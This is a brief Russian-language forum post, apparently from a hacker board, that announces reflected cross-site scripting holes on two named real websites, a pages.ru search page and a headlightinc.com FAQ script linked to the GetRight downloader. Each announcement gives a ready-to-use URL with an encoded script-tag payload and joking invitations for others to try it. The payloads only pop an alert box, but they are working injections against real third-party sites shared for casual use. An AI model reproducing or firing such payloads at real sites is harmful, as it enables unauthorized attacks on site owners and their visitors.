XSS на pages.ru (интересно, а кто-нибудь с АЧата на нём хостится ):

_http://www.pages.ru/search.html?text=%3Cscript%3Ealert%28%2Fback0rific e%2F%29%3C%2Fscript%3E&doSearch=%CD%E0%E9%F2%E8 - тройной alert() не хотели, хех ?!

Кто-нибудь юзает качалку GetRight? Тогда - держите XSS и не отрывайтесь:

_http://www.headlightinc.com/cgi-bin/faq.cgi?filter=%3Cscript%3Ealert%28%2Fback0rifice% 2F%29%3C%2Fscript%3E&submit1=Search